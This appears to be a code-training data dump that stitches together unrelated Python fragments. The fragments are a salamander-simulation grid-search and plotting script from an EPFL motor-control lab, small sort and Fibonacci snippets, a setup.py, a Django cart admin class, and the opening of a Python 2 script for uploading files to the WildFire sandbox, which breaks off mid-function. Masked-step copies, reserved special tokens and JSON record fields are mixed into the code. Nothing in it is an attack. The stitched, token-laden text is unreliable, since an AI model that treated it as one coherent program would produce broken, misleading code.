plot_2d(results_en, ['Amplitude Head [rad]', 'Amplitude Tail [rad]',
'$log_{10}(Energy)$[J]'])
plt.figure('Ratio')
plot_2d(ratio_vel_en, ['Amplitude Head [rad]', 'Amplitude Tail [rad]',
'Ratio V/E $[s\\cdot kg^{-1}\\cdot m^{-1}]$'])
t = time.time()
plt.show()
if __name__ == '__main__':
main()
<|reserved_special_token_1|>
<|reserved_special_token_0|>
import time
import numpy as np
import matplotlib.pyplot as plt
from plot_results import plot_2d
from run_simulation import run_simulation
from simulation_parameters import SimulationParameters
def exercise_9c(world, timestep, reset):
"""Exercise 9c"""
n_joints = 10
Rhead = 0.44
Rtail = 0.23
parameter_set = [SimulationParameters(simulation_duration=15, drive=4.0,
amplitudes=None, phase_lag=None, turn=None, amplitude_gradient=[
Rhead, Rtail], backward=None, frequency=1)]
for simulation_i, parameters in enumerate(parameter_set):
reset.reset()
run_simulation(world, parameters, timestep, int(1000 * parameters.
simulation_duration / timestep), logs=
'./logs/9c/simulation_{}.npz'.format(simulation_i))
plot_9c(parameter_set)
def main():
n_joints = 10
parameter_set = [SimulationParameters(simulation_duration=15, drive=4.0,
amplitudes=None, phase_lag=None, turn=None, amplitude_gradient=[
Rhead, Rtail], backward=None, frequency=1) for Rhead in np.linspace
(0.2, 0.5, 10) for Rtail in np.linspace(0.5, 0.2, 10)]
plot_9c(parameter_set)
def plot_9c(parameter_set):
results_vel = np.zeros([len(parameter_set), 3])
results_en = np.zeros([len(parameter_set), 3])
ratio_vel_en = np.zeros([len(parameter_set), 3])
sal_pos_t = []
sal_pos_t_bad = []
t = time.time()
path = (
'D:/EPFL/MA2/Computational Motor Control/Local/Lab9/Webots/controllers/pythonController/'
)
print(path)
for i in range(len(parameter_set)):
with np.load(path + '/logs/9c/simulation_' + str(i) + '.npz',
allow_pickle=True) as data:
position = data['links'][:, 0, :]
n_steps = len(position)
timestep = float(data['timestep'])
results_vel[i][0] = data['amplitude_gradient'][0]
results_vel[i][1] = data['amplitude_gradient'][1]
results_en[i][:2] = results_vel[i][:2]
ratio_vel_en[i][:2] = results_vel[i][:2]
begin_step = int(4 / timestep)
vel = (position[n_steps - 1, :] - position[begin_step, :]) ** 2
results_vel[i][2] = np.sqrt(np.sum(vel)) / ((n_steps -
begin_step) * timestep)
joint_vel = data['joints'][begin_step:, :, 1]
joint_tor = data['joints'][begin_step:, :, 3]
energy = joint_vel * joint_tor
results_en[i][2] = np.log10(np.mean(np.sum(energy, 1)))
ratio_vel_en[i][2] = results_vel[i][2] / results_en[i][2]
print('Time elapsed for the velocity plot' + str(time.time() - t))
plt.figure('Velocity')
plot_2d(results_vel, ['Amplitude Head [rad]', 'Amplitude Tail [rad]',
'Velocity [m/s]'])
plt.figure('Energy')
plot_2d(results_en, ['Amplitude Head [rad]', 'Amplitude Tail [rad]',
'$log_{10}(Energy)$[J]'])
plt.figure('Ratio')
plot_2d(ratio_vel_en, ['Amplitude Head [rad]', 'Amplitude Tail [rad]',
'Ratio V/E $[s\\cdot kg^{-1}\\cdot m^{-1}]$'])
t = time.time()
plt.show()
if __name__ == '__main__':
main()
<|reserved_special_token_1|>
"""Exercise 9c"""
import time
import numpy as np
import matplotlib.pyplot as plt
from plot_results import plot_2d
from run_simulation import run_simulation
from simulation_parameters import SimulationParameters
def exercise_9c(world, timestep, reset):
"""Exercise 9c"""
n_joints = 10
Rhead = 0.44
Rtail = 0.23
parameter_set = [
SimulationParameters(
simulation_duration=15,
drive=4.0,
amplitudes=None,
phase_lag=None,
turn=None,
amplitude_gradient=[Rhead, Rtail], #[4.0,2.0],
backward = None,
frequency = 1,
# ...
)
#for Rhead in np.linspace(0.2,0.5,10)
#for Rtail in np.linspace(0.5,0.2,10)
# for amplitudes in ...
# for ...
]
# Grid search
for simulation_i, parameters in enumerate(parameter_set):
reset.reset()
run_simulation(
world,
parameters,
timestep,
int(1000*parameters.simulation_duration/timestep),
logs="./logs/9c/simulation_{}.npz".format(simulation_i)
)
plot_9c(parameter_set)
def main():
n_joints = 10
#Rhead = 0.44
#Rtail = 0.27
parameter_set = [
SimulationParameters(
simulation_duration=15,
drive=4.0,
amplitudes=None,
phase_lag=None,
turn=None,
amplitude_gradient=[Rhead, Rtail], #[4.0,2.0],
backward = None,
frequency = 1,
# ...
)
for Rhead in np.linspace(0.2,0.5,10)
for Rtail in np.linspace(0.5,0.2,10)
# for amplitudes in ...
# for ...
]
plot_9c(parameter_set)
def plot_9c(parameter_set):
results_vel = np.zeros([len(parameter_set),3])
results_en = np.zeros([len(parameter_set),3])
ratio_vel_en = np.zeros([len(parameter_set),3])
sal_pos_t = []
sal_pos_t_bad = []
t = time.time()
#path = os.path.dirname(__file__)
path = 'D:/EPFL/MA2/Computational Motor Control/Local/Lab9/Webots/controllers/pythonController/'
print(path)
for i in range(len(parameter_set)):
with np.load(path+'/logs/9c/simulation_'+str(i)+'.npz',allow_pickle=True) as data:
#? initialisation for the computation
position = data["links"][:, 0, :]
n_steps = len(position)
timestep = float(data["timestep"])
results_vel[i][0] = data["amplitude_gradient"][0]
results_vel[i][1] = data["amplitude_gradient"][1]
results_en[i][:2] = results_vel[i][:2]
ratio_vel_en[i][:2] = results_vel[i][:2]
#! Velocity
begin_step = (int)(4/timestep)
vel = (position[n_steps-1,:] - position[begin_step,:])**2
results_vel[i][2] = np.sqrt(np.sum(vel))/((n_steps-begin_step)*timestep)
#! Energy
joint_vel = data["joints"][begin_step:,:,1]
joint_tor = data["joints"][begin_step:,:,3]
energy = joint_vel * joint_tor
results_en[i][2] = np.log10(np.mean(np.sum(energy,1)))
#! Ratio
ratio_vel_en[i][2] = results_vel[i][2]/results_en[i][2]
print ('Time elapsed for the velocity plot' + str(time.time()-t))
plt.figure("Velocity")
plot_2d(results_vel,['Amplitude Head [rad]', 'Amplitude Tail [rad]', 'Velocity [m/s]'])
plt.figure("Energy")
plot_2d(results_en,['Amplitude Head [rad]', 'Amplitude Tail [rad]', '$log_{10}(Energy)$[J]'])
plt.figure("Ratio")
plot_2d(ratio_vel_en,['Amplitude Head [rad]', 'Amplitude Tail [rad]', 'Ratio V/E $[s\cdot kg^{-1}\cdot m^{-1}]$'])
t = time.time()
plt.show()
if __name__ == '__main__':
main()
|
flexible
|
{
"blob_id": "a0284eba1a0e6c498f240068c586e7f8b79cd86c",
"index": 5782,
"step-1": "<mask token>\n\n\ndef main():\n n_joints = 10\n parameter_set = [SimulationParameters(simulation_duration=15, drive=4.0,\n amplitudes=None, phase_lag=None, turn=None, amplitude_gradient=[\n Rhead, Rtail], backward=None, frequency=1) for Rhead in np.linspace\n (0.2, 0.5, 10) for Rtail in np.linspace(0.5, 0.2, 10)]\n plot_9c(parameter_set)\n\n\ndef plot_9c(parameter_set):\n results_vel = np.zeros([len(parameter_set), 3])\n results_en = np.zeros([len(parameter_set), 3])\n ratio_vel_en = np.zeros([len(parameter_set), 3])\n sal_pos_t = []\n sal_pos_t_bad = []\n t = time.time()\n path = (\n 'D:/EPFL/MA2/Computational Motor Control/Local/Lab9/Webots/controllers/pythonController/'\n )\n print(path)\n for i in range(len(parameter_set)):\n with np.load(path + '/logs/9c/simulation_' + str(i) + '.npz',\n allow_pickle=True) as data:\n position = data['links'][:, 0, :]\n n_steps = len(position)\n timestep = float(data['timestep'])\n results_vel[i][0] = data['amplitude_gradient'][0]\n results_vel[i][1] = data['amplitude_gradient'][1]\n results_en[i][:2] = results_vel[i][:2]\n ratio_vel_en[i][:2] = results_vel[i][:2]\n begin_step = int(4 / timestep)\n vel = (position[n_steps - 1, :] - position[begin_step, :]) ** 2\n results_vel[i][2] = np.sqrt(np.sum(vel)) / ((n_steps -\n begin_step) * timestep)\n joint_vel = data['joints'][begin_step:, :, 1]\n joint_tor = data['joints'][begin_step:, :, 3]\n energy = joint_vel * joint_tor\n results_en[i][2] = np.log10(np.mean(np.sum(energy, 1)))\n ratio_vel_en[i][2] = results_vel[i][2] / results_en[i][2]\n print('Time elapsed for the velocity plot' + str(time.time() - t))\n plt.figure('Velocity')\n plot_2d(results_vel, ['Amplitude Head [rad]', 'Amplitude Tail [rad]',\n 'Velocity [m/s]'])\n plt.figure('Energy')\n plot_2d(results_en, ['Amplitude Head [rad]', 'Amplitude Tail [rad]',\n '$log_{10}(Energy)$[J]'])\n plt.figure('Ratio')\n plot_2d(ratio_vel_en, ['Amplitude Head [rad]', 'Amplitude Tail [rad]',\n 'Ratio V/E $[s\\\\cdot kg^{-1}\\\\cdot m^{-1}]$'])\n t = time.time()\n plt.show()\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef exercise_9c(world, timestep, reset):\n \"\"\"Exercise 9c\"\"\"\n n_joints = 10\n Rhead = 0.44\n Rtail = 0.23\n parameter_set = [SimulationParameters(simulation_duration=15, drive=4.0,\n amplitudes=None, phase_lag=None, turn=None, amplitude_gradient=[\n Rhead, Rtail], backward=None, frequency=1)]\n for simulation_i, parameters in enumerate(parameter_set):\n reset.reset()\n run_simulation(world, parameters, timestep, int(1000 * parameters.\n simulation_duration / timestep), logs=\n './logs/9c/simulation_{}.npz'.format(simulation_i))\n plot_9c(parameter_set)\n\n\ndef main():\n n_joints = 10\n parameter_set = [SimulationParameters(simulation_duration=15, drive=4.0,\n amplitudes=None, phase_lag=None, turn=None, amplitude_gradient=[\n Rhead, Rtail], backward=None, frequency=1) for Rhead in np.linspace\n (0.2, 0.5, 10) for Rtail in np.linspace(0.5, 0.2, 10)]\n plot_9c(parameter_set)\n\n\ndef plot_9c(parameter_set):\n results_vel = np.zeros([len(parameter_set), 3])\n results_en = np.zeros([len(parameter_set), 3])\n ratio_vel_en = np.zeros([len(parameter_set), 3])\n sal_pos_t = []\n sal_pos_t_bad = []\n t = time.time()\n path = (\n 'D:/EPFL/MA2/Computational Motor Control/Local/Lab9/Webots/controllers/pythonController/'\n )\n print(path)\n for i in range(len(parameter_set)):\n with np.load(path + '/logs/9c/simulation_' + str(i) + '.npz',\n allow_pickle=True) as data:\n position = data['links'][:, 0, :]\n n_steps = len(position)\n timestep = float(data['timestep'])\n results_vel[i][0] = data['amplitude_gradient'][0]\n results_vel[i][1] = data['amplitude_gradient'][1]\n results_en[i][:2] = results_vel[i][:2]\n ratio_vel_en[i][:2] = results_vel[i][:2]\n begin_step = int(4 / timestep)\n vel = (position[n_steps - 1, :] - position[begin_step, :]) ** 2\n results_vel[i][2] = np.sqrt(np.sum(vel)) / ((n_steps -\n begin_step) * timestep)\n joint_vel = data['joints'][begin_step:, :, 1]\n joint_tor = data['joints'][begin_step:, :, 3]\n energy = joint_vel * joint_tor\n results_en[i][2] = np.log10(np.mean(np.sum(energy, 1)))\n ratio_vel_en[i][2] = results_vel[i][2] / results_en[i][2]\n print('Time elapsed for the velocity plot' + str(time.time() - t))\n plt.figure('Velocity')\n plot_2d(results_vel, ['Amplitude Head [rad]', 'Amplitude Tail [rad]',\n 'Velocity [m/s]'])\n plt.figure('Energy')\n plot_2d(results_en, ['Amplitude Head [rad]', 'Amplitude Tail [rad]',\n '$log_{10}(Energy)$[J]'])\n plt.figure('Ratio')\n plot_2d(ratio_vel_en, ['Amplitude Head [rad]', 'Amplitude Tail [rad]',\n 'Ratio V/E $[s\\\\cdot kg^{-1}\\\\cdot m^{-1}]$'])\n t = time.time()\n plt.show()\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef exercise_9c(world, timestep, reset):\n \"\"\"Exercise 9c\"\"\"\n n_joints = 10\n Rhead = 0.44\n Rtail = 0.23\n parameter_set = [SimulationParameters(simulation_duration=15, drive=4.0,\n amplitudes=None, phase_lag=None, turn=None, amplitude_gradient=[\n Rhead, Rtail], backward=None, frequency=1)]\n for simulation_i, parameters in enumerate(parameter_set):\n reset.reset()\n run_simulation(world, parameters, timestep, int(1000 * parameters.\n simulation_duration / timestep), logs=\n './logs/9c/simulation_{}.npz'.format(simulation_i))\n plot_9c(parameter_set)\n\n\ndef main():\n n_joints = 10\n parameter_set = [SimulationParameters(simulation_duration=15, drive=4.0,\n amplitudes=None, phase_lag=None, turn=None, amplitude_gradient=[\n Rhead, Rtail], backward=None, frequency=1) for Rhead in np.linspace\n (0.2, 0.5, 10) for Rtail in np.linspace(0.5, 0.2, 10)]\n plot_9c(parameter_set)\n\n\ndef plot_9c(parameter_set):\n results_vel = np.zeros([len(parameter_set), 3])\n results_en = np.zeros([len(parameter_set), 3])\n ratio_vel_en = np.zeros([len(parameter_set), 3])\n sal_pos_t = []\n sal_pos_t_bad = []\n t = time.time()\n path = (\n 'D:/EPFL/MA2/Computational Motor Control/Local/Lab9/Webots/controllers/pythonController/'\n )\n print(path)\n for i in range(len(parameter_set)):\n with np.load(path + '/logs/9c/simulation_' + str(i) + '.npz',\n allow_pickle=True) as data:\n position = data['links'][:, 0, :]\n n_steps = len(position)\n timestep = float(data['timestep'])\n results_vel[i][0] = data['amplitude_gradient'][0]\n results_vel[i][1] = data['amplitude_gradient'][1]\n results_en[i][:2] = results_vel[i][:2]\n ratio_vel_en[i][:2] = results_vel[i][:2]\n begin_step = int(4 / timestep)\n vel = (position[n_steps - 1, :] - position[begin_step, :]) ** 2\n results_vel[i][2] = np.sqrt(np.sum(vel)) / ((n_steps -\n begin_step) * timestep)\n joint_vel = data['joints'][begin_step:, :, 1]\n joint_tor = data['joints'][begin_step:, :, 3]\n energy = joint_vel * joint_tor\n results_en[i][2] = np.log10(np.mean(np.sum(energy, 1)))\n ratio_vel_en[i][2] = results_vel[i][2] / results_en[i][2]\n print('Time elapsed for the velocity plot' + str(time.time() - t))\n plt.figure('Velocity')\n plot_2d(results_vel, ['Amplitude Head [rad]', 'Amplitude Tail [rad]',\n 'Velocity [m/s]'])\n plt.figure('Energy')\n plot_2d(results_en, ['Amplitude Head [rad]', 'Amplitude Tail [rad]',\n '$log_{10}(Energy)$[J]'])\n plt.figure('Ratio')\n plot_2d(ratio_vel_en, ['Amplitude Head [rad]', 'Amplitude Tail [rad]',\n 'Ratio V/E $[s\\\\cdot kg^{-1}\\\\cdot m^{-1}]$'])\n t = time.time()\n plt.show()\n\n\nif __name__ == '__main__':\n main()\n",
"step-4": "<mask token>\nimport time\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom plot_results import plot_2d\nfrom run_simulation import run_simulation\nfrom simulation_parameters import SimulationParameters\n\n\ndef exercise_9c(world, timestep, reset):\n \"\"\"Exercise 9c\"\"\"\n n_joints = 10\n Rhead = 0.44\n Rtail = 0.23\n parameter_set = [SimulationParameters(simulation_duration=15, drive=4.0,\n amplitudes=None, phase_lag=None, turn=None, amplitude_gradient=[\n Rhead, Rtail], backward=None, frequency=1)]\n for simulation_i, parameters in enumerate(parameter_set):\n reset.reset()\n run_simulation(world, parameters, timestep, int(1000 * parameters.\n simulation_duration / timestep), logs=\n './logs/9c/simulation_{}.npz'.format(simulation_i))\n plot_9c(parameter_set)\n\n\ndef main():\n n_joints = 10\n parameter_set = [SimulationParameters(simulation_duration=15, drive=4.0,\n amplitudes=None, phase_lag=None, turn=None, amplitude_gradient=[\n Rhead, Rtail], backward=None, frequency=1) for Rhead in np.linspace\n (0.2, 0.5, 10) for Rtail in np.linspace(0.5, 0.2, 10)]\n plot_9c(parameter_set)\n\n\ndef plot_9c(parameter_set):\n results_vel = np.zeros([len(parameter_set), 3])\n results_en = np.zeros([len(parameter_set), 3])\n ratio_vel_en = np.zeros([len(parameter_set), 3])\n sal_pos_t = []\n sal_pos_t_bad = []\n t = time.time()\n path = (\n 'D:/EPFL/MA2/Computational Motor Control/Local/Lab9/Webots/controllers/pythonController/'\n )\n print(path)\n for i in range(len(parameter_set)):\n with np.load(path + '/logs/9c/simulation_' + str(i) + '.npz',\n allow_pickle=True) as data:\n position = data['links'][:, 0, :]\n n_steps = len(position)\n timestep = float(data['timestep'])\n results_vel[i][0] = data['amplitude_gradient'][0]\n results_vel[i][1] = data['amplitude_gradient'][1]\n results_en[i][:2] = results_vel[i][:2]\n ratio_vel_en[i][:2] = results_vel[i][:2]\n begin_step = int(4 / timestep)\n vel = (position[n_steps - 1, :] - position[begin_step, :]) ** 2\n results_vel[i][2] = np.sqrt(np.sum(vel)) / ((n_steps -\n begin_step) * timestep)\n joint_vel = data['joints'][begin_step:, :, 1]\n joint_tor = data['joints'][begin_step:, :, 3]\n energy = joint_vel * joint_tor\n results_en[i][2] = np.log10(np.mean(np.sum(energy, 1)))\n ratio_vel_en[i][2] = results_vel[i][2] / results_en[i][2]\n print('Time elapsed for the velocity plot' + str(time.time() - t))\n plt.figure('Velocity')\n plot_2d(results_vel, ['Amplitude Head [rad]', 'Amplitude Tail [rad]',\n 'Velocity [m/s]'])\n plt.figure('Energy')\n plot_2d(results_en, ['Amplitude Head [rad]', 'Amplitude Tail [rad]',\n '$log_{10}(Energy)$[J]'])\n plt.figure('Ratio')\n plot_2d(ratio_vel_en, ['Amplitude Head [rad]', 'Amplitude Tail [rad]',\n 'Ratio V/E $[s\\\\cdot kg^{-1}\\\\cdot m^{-1}]$'])\n t = time.time()\n plt.show()\n\n\nif __name__ == '__main__':\n main()\n",
"step-5": "\"\"\"Exercise 9c\"\"\"\n\nimport time\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom plot_results import plot_2d\nfrom run_simulation import run_simulation\nfrom simulation_parameters import SimulationParameters\n\ndef exercise_9c(world, timestep, reset):\n \"\"\"Exercise 9c\"\"\"\n\n n_joints = 10\n \n Rhead = 0.44\n Rtail = 0.23\n\n\n parameter_set = [\n SimulationParameters(\n simulation_duration=15,\n drive=4.0,\n amplitudes=None,\n phase_lag=None,\n turn=None,\n amplitude_gradient=[Rhead, Rtail], #[4.0,2.0],\n backward = None,\n frequency = 1,\n # ...\n )\n \n #for Rhead in np.linspace(0.2,0.5,10)\n #for Rtail in np.linspace(0.5,0.2,10)\n # for amplitudes in ...\n # for ...\n ]\n\n \n # Grid search\n for simulation_i, parameters in enumerate(parameter_set):\n reset.reset()\n run_simulation(\n world,\n parameters,\n timestep,\n int(1000*parameters.simulation_duration/timestep),\n logs=\"./logs/9c/simulation_{}.npz\".format(simulation_i)\n )\n\n \n\n plot_9c(parameter_set)\n \n\n \n\ndef main():\n\n\n n_joints = 10\n\n #Rhead = 0.44\n #Rtail = 0.27 \n \n parameter_set = [\n SimulationParameters(\n simulation_duration=15,\n drive=4.0,\n amplitudes=None,\n phase_lag=None,\n turn=None,\n amplitude_gradient=[Rhead, Rtail], #[4.0,2.0],\n backward = None,\n frequency = 1,\n # ...\n )\n \n for Rhead in np.linspace(0.2,0.5,10)\n for Rtail in np.linspace(0.5,0.2,10)\n # for amplitudes in ...\n # for ...\n ]\n\n plot_9c(parameter_set)\n\n \ndef plot_9c(parameter_set):\n results_vel = np.zeros([len(parameter_set),3])\n results_en = np.zeros([len(parameter_set),3])\n ratio_vel_en = np.zeros([len(parameter_set),3])\n \n \n sal_pos_t = []\n sal_pos_t_bad = []\n\n \n t = time.time()\n\n #path = os.path.dirname(__file__)\n path = 'D:/EPFL/MA2/Computational Motor Control/Local/Lab9/Webots/controllers/pythonController/'\n print(path)\n for i in range(len(parameter_set)):\n with np.load(path+'/logs/9c/simulation_'+str(i)+'.npz',allow_pickle=True) as data:\n \n #? initialisation for the computation\n position = data[\"links\"][:, 0, :]\n n_steps = len(position)\n \n timestep = float(data[\"timestep\"])\n\n results_vel[i][0] = data[\"amplitude_gradient\"][0]\n results_vel[i][1] = data[\"amplitude_gradient\"][1] \n\n results_en[i][:2] = results_vel[i][:2] \n ratio_vel_en[i][:2] = results_vel[i][:2]\n\n \n\n #! Velocity\n\n begin_step = (int)(4/timestep)\n\n vel = (position[n_steps-1,:] - position[begin_step,:])**2\n results_vel[i][2] = np.sqrt(np.sum(vel))/((n_steps-begin_step)*timestep)\n\n #! Energy\n\n joint_vel = data[\"joints\"][begin_step:,:,1]\n joint_tor = data[\"joints\"][begin_step:,:,3]\n\n energy = joint_vel * joint_tor\n \n results_en[i][2] = np.log10(np.mean(np.sum(energy,1)))\n \n #! Ratio \n\n ratio_vel_en[i][2] = results_vel[i][2]/results_en[i][2]\n \n \n print ('Time elapsed for the velocity plot' + str(time.time()-t))\n\n\n\n plt.figure(\"Velocity\")\n plot_2d(results_vel,['Amplitude Head [rad]', 'Amplitude Tail [rad]', 'Velocity [m/s]'])\n plt.figure(\"Energy\")\n plot_2d(results_en,['Amplitude Head [rad]', 'Amplitude Tail [rad]', '$log_{10}(Energy)$[J]'])\n plt.figure(\"Ratio\")\n plot_2d(ratio_vel_en,['Amplitude Head [rad]', 'Amplitude Tail [rad]', 'Ratio V/E $[s\\cdot kg^{-1}\\cdot m^{-1}]$'])\n \n t = time.time()\n \n plt.show() \n\nif __name__ == '__main__':\n main()\n",
"step-ids": [
2,
3,
4,
5,
6
]
}
|
[
2,
3,
4,
5,
6
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
for i in range(n):
inp = int(input())
lista.append(inp)
lista.sort(reverse=True)
print(lista[0])
print(lista[1])
<|reserved_special_token_1|>
n = int(input())
lista = []
for i in range(n):
inp = int(input())
lista.append(inp)
lista.sort(reverse=True)
print(lista[0])
print(lista[1])
|
flexible
|
{
"blob_id": "b03960999fa30a55932ada7fbf731a3861b840ae",
"index": 3496,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nfor i in range(n):\n inp = int(input())\n lista.append(inp)\nlista.sort(reverse=True)\nprint(lista[0])\nprint(lista[1])\n",
"step-3": "n = int(input())\nlista = []\nfor i in range(n):\n inp = int(input())\n lista.append(inp)\nlista.sort(reverse=True)\nprint(lista[0])\nprint(lista[1])\n",
"step-4": null,
"step-5": null,
"step-ids": [
0,
1,
2
]
}
|
[
0,
1,
2
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
while True:
if fib[counter] > 4000000:
flag = 0
break
else:
fib.append(fib[counter] + fib[counter - 1])
counter += 1
<|reserved_special_token_0|>
print(total)
<|reserved_special_token_1|>
fib = [1, 2]
counter = 1
while True:
if fib[counter] > 4000000:
flag = 0
break
else:
fib.append(fib[counter] + fib[counter - 1])
counter += 1
fib = fib[0:len(fib) - 1]
total = sum(fib)
print(total)
<|reserved_special_token_1|>
# coding: utf-8
# In[50]:
## Description
## Adds the Fibonacci numbers smaller than 4 million
## Weekly Journal
## When using while True, "break" MUST be used to avoid infinite loops
## Questions
## None
fib=[1,2]
counter=1
while True:
if fib[counter]>4000000:
flag=0
break
else:
fib.append(fib[counter]+fib[counter-1])
counter+=1
fib=fib[0:len(fib)-1]
total=sum(fib)
print(total)
|
flexible
|
{
"blob_id": "e2572b48f7183353ba2aab0500130dc8a71a0b22",
"index": 5286,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nwhile True:\n if fib[counter] > 4000000:\n flag = 0\n break\n else:\n fib.append(fib[counter] + fib[counter - 1])\n counter += 1\n<mask token>\nprint(total)\n",
"step-3": "fib = [1, 2]\ncounter = 1\nwhile True:\n if fib[counter] > 4000000:\n flag = 0\n break\n else:\n fib.append(fib[counter] + fib[counter - 1])\n counter += 1\nfib = fib[0:len(fib) - 1]\ntotal = sum(fib)\nprint(total)\n",
"step-4": "\n# coding: utf-8\n\n# In[50]:\n\n\n## Description\n## Adds the Fibonacci numbers smaller than 4 million\n\n## Weekly Journal\n## When using while True, \"break\" MUST be used to avoid infinite loops\n\n## Questions\n## None\n\nfib=[1,2]\ncounter=1\nwhile True:\n if fib[counter]>4000000:\n flag=0\n break\n else:\n fib.append(fib[counter]+fib[counter-1])\n counter+=1\nfib=fib[0:len(fib)-1]\ntotal=sum(fib)\nprint(total)\n\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
setup(name='testcov-plugin', version='1.0', packages=['testcov'],
namespace_packages=['testcov'], entry_points={'plugins': [
'testp = testcov.plugin:testp']}, description='Test for coverage bug')
<|reserved_special_token_1|>
import io
import os
from setuptools import setup
setup(name='testcov-plugin', version='1.0', packages=['testcov'],
namespace_packages=['testcov'], entry_points={'plugins': [
'testp = testcov.plugin:testp']}, description='Test for coverage bug')
<|reserved_special_token_1|>
import io
import os
from setuptools import setup
setup(name='testcov-plugin',
version='1.0',
packages=['testcov'],
namespace_packages=['testcov'],
entry_points={
'plugins': ['testp = testcov.plugin:testp'],
},
description="Test for coverage bug")
|
flexible
|
{
"blob_id": "88f5aa56eca6b61ba2b428bff0efdf4ec7f5f5d9",
"index": 1913,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nsetup(name='testcov-plugin', version='1.0', packages=['testcov'],\n namespace_packages=['testcov'], entry_points={'plugins': [\n 'testp = testcov.plugin:testp']}, description='Test for coverage bug')\n",
"step-3": "import io\nimport os\nfrom setuptools import setup\nsetup(name='testcov-plugin', version='1.0', packages=['testcov'],\n namespace_packages=['testcov'], entry_points={'plugins': [\n 'testp = testcov.plugin:testp']}, description='Test for coverage bug')\n",
"step-4": "import io\nimport os\nfrom setuptools import setup\n\n\nsetup(name='testcov-plugin',\n version='1.0',\n packages=['testcov'],\n namespace_packages=['testcov'],\n entry_points={\n 'plugins': ['testp = testcov.plugin:testp'],\n },\n description=\"Test for coverage bug\")\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
from django.contrib import admin
from apps.cart.models import *
# Register your models here.
class CartAdmin(admin.ModelAdmin):
list_display = ('user_id', 'goods_id', 'goods_num')
search_fields = ('user_id', 'goods_id', 'goods_num')
list_filter = ['user_id', 'goods_id', 'goods_num']
admin.site.register(Cart, CartAdmin)
|
normal
|
{
"blob_id": "222948fb0a991bb6d7faa186c7442a303b88290b",
"index": 7184,
"step-1": "<mask token>\n\n\nclass CartAdmin(admin.ModelAdmin):\n <mask token>\n <mask token>\n <mask token>\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass CartAdmin(admin.ModelAdmin):\n list_display = 'user_id', 'goods_id', 'goods_num'\n search_fields = 'user_id', 'goods_id', 'goods_num'\n list_filter = ['user_id', 'goods_id', 'goods_num']\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\nclass CartAdmin(admin.ModelAdmin):\n list_display = 'user_id', 'goods_id', 'goods_num'\n search_fields = 'user_id', 'goods_id', 'goods_num'\n list_filter = ['user_id', 'goods_id', 'goods_num']\n\n\nadmin.site.register(Cart, CartAdmin)\n",
"step-4": "from django.contrib import admin\nfrom apps.cart.models import *\n\n\nclass CartAdmin(admin.ModelAdmin):\n list_display = 'user_id', 'goods_id', 'goods_num'\n search_fields = 'user_id', 'goods_id', 'goods_num'\n list_filter = ['user_id', 'goods_id', 'goods_num']\n\n\nadmin.site.register(Cart, CartAdmin)\n",
"step-5": "from django.contrib import admin\r\nfrom apps.cart.models import *\r\n\r\n\r\n# Register your models here.\r\nclass CartAdmin(admin.ModelAdmin):\r\n list_display = ('user_id', 'goods_id', 'goods_num')\r\n search_fields = ('user_id', 'goods_id', 'goods_num')\r\n list_filter = ['user_id', 'goods_id', 'goods_num']\r\n\r\n\r\nadmin.site.register(Cart, CartAdmin)\r\n",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
#!/usr/bin/env python
import argparse
import requests
import sys
import os
import xml.dom.minidom
__author__ = 'Tighe Schlottog || [email protected]'
'''
wf.py is a script to interact with the WildFire API to upload files or pull back reports on specific hashes. You
need to have the argparse and requests installed. Both modules perform their functions perfectly for the work that
is looking to be completed.
For functional assistance, check out the -h or --help options while executing the wf.py script.
Currently the script is configured to use the WildFire public cloud, but you can easily adapt it to use your WF-500.
This script is only for use with file uploads and report pulling.
File uploads are completed and the WildFire reported SHA256 hash will be output.
Report pulls are written in the format of wildfire-report-<SHA256 hash>.<report format>, they can be either PDF or
XML.
'''
# Global Variables (only edit these)
wf_upload_url = 'https://wildfire.paloaltonetworks.com/publicapi/submit/file'
wf_report_url = 'https://wildfire.paloaltonetworks.com/publicapi/get/report'
def parse_args():
'''
This function is used to parse the CLI arguments that are passed into the function, after parsing the data it will
return both the parser itself and the parsed arguments. While not needed, the parser is passed back in case of
future need.
:return: parser - the argparse parser itself
:return: args - the parsed CLI arguments
'''
parser = argparse.ArgumentParser(description='Script to upload unknown files to WildFire.')
group = parser.add_mutually_exclusive_group()
group.add_argument('-f', '--file', type=str, help='Location of file to upload to WildFire')
group.add_argument('-d', '--dir', type=str, help='Location of directory of files to upload to WildFire')
parser.add_argument('-hash', type=str, help='SHA256 hash of file to pull report from WildFire')
parser.add_argument('-api_key', type=str, help='WildFire API Key')
parser.add_argument('-format', type=str, default='pdf', help='Report file format (either xml or pdf)')
parser.add_argument('-hf', '--hashfile', type=str, help='File of hashes to pull reports from WildFire')
args = parser.parse_args()
check_args(parser, args)
return parser, args
def check_args(parser, wf_args):
'''
This function will take in the parser and the parsed args and will perform some basic verification checks. The
checks themselves are more complicated than rules that I can feed into the argparse module.
:param parser: argparse parser
:param wf_args: parsed CLI arguments, came from the parser argparse handler
:return: Nothing, this is just a basic verification check. The function will exit the entire script if it doesn't
pass muster.
'''
if not (((wf_args.file or wf_args.dir) or ((str(wf_args.format).lower() != 'xml' or str(wf_args.format).lower() != 'pdf')and wf_args.hash)) and wf_args.api_key):
print "You are missing one of the necessary options, please check your command structure and try again."
parser.print_help()
sys.exit()
def wf_error_codes(error_code):
'''
This function will take in the HTTP error codes from the requests function in both the upload and download functions
and parse them out into human readable error messages.
:param error_code: http error code from the requests module functions (req_handler.status_code)
:return: Nothing, this will dump human readable errors and exit the script.
'''
if error_code == 401:
print "HTTP Error %s: API Key is invalid, please retry with valid WildFire API key" % error_code
sys.exit()
elif error_code == 404:
